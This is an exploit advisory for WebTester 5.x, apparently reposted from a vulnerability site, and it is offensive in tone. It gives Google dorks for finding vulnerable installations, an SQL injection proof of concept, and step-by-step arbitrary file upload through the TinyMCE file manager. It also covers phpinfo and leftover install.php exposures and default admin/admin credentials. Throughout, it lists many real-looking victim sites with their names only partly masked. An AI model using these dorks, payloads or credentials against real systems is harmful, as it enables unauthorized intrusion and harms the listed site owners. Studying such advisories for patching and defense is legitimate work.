WebTester 5.x SQL Injection & File Upload & Disclosure

2013.10.16
Credit: X-Cisadane
Risk: High
Local: No
Remote: Yes
CVE: N/A

========================================================================================== WebTester 5.x Multiple Vulnerabilities ========================================================================================== :----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : WebTester 5.x Multiple Vulnerabilities : # Date : 15 October 2013 : # Author : X-Cisadane : # CMS Developer : http://epplersoft.com/webtester.html : # CMS Source Code : http://sourceforge.net/projects/webtesteronline/ : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File : # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------: DORKS (How to find the target) : ================================ intext:Copyright © 2003 - 2010 Eppler Software inurl:/go.php?testID= intitle:WebTester Online Testing Or use your own Google Dorks :) Proof of Concept ================ [ 1 ] SQL Injection POC : http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi] Example : http://simuladodiXreitocespe.com/startTest.php?FirstName=a&LastName=a&TestID='5 http://www.hXuertos.Xeu/encuesta/startTest.php?FirstName=a&LastName=a&TestID='5 http://autoskola-burXatrans.com/templates/default/ispiti/startTest.php?FirstName=a&LastName=a&TestID='5 http://conalepnl091.Xsytes.net/simulador/startTest.php?FirstName=a&LastName=a&TestID='5 http://learnin.elscXXhool.pl/startTest.php?FirstName=a&LastName=a&TestID='5 ...etc... [ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager) Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager. It can be found in tiny_mce/plugins/filemanager. Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Example the target is http://onlinetests.germaniak.eu/ Change the url to http://onlinetests.germaniak.eu/tiny_mce/plugins/filemanager/InsertFile/insert_file.php Pic #1 : http://i40.tinypic.com/117z390.png Then tick : Insert filetype icon, Insert file size & Insert file modification date. Click upload and wait until the file sent to the server. Pic #2 : http://i39.tinypic.com/2wluaon.png Pic #3 : http://i40.tinypic.com/2uh0fir.png If the file was successfully uploaded, check in the /test-images/ directory. For Example : http://onlinetests.Xaniak.eu/test-images/ http://www.rXznik.org/test/test-images/ http://siXla.se/fun/webtester5/test-images/ http://811lifeXecoach.com/test-images/ http://umpireXplashprojects.co.uk/test-images/ http://zamowXrvista.org/test-images/ ...etc... [ 3 ] PHPInfo() Disclosure POC : http://[Site]/[Path]/phpinfo.php Example : http://mhsquiz.mXheadschools.org/webtester/phpinfo.php http://test.auXiu.com/phpinfo.php http://test.deltXools.com/phpinfo.php http://www.nooXkool.com/toetse/phpinfo.php http://bocahomXealth.com/exam/phpinfo.php ...etc... [ 4 ] Leftover install.php File POC : http://[Site]/[Path]/install.php Example : http://www.ibeucXposmacae.com.br/webtester5/install.php http://briefhealXrograms.com/webtester5/install.php http://intgvXardnervna.org/test/install.php http://delXllege.com/POSTUTME/install.php http://www.orXnhs.org/webtester/install.php ...etc... Bonus : Default Username and Password Username : admin Password : admin Admin Control Panel : http://[Site]/[Path]/admin/

References:

http://sourceforge.net/projects/webtesteronline/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top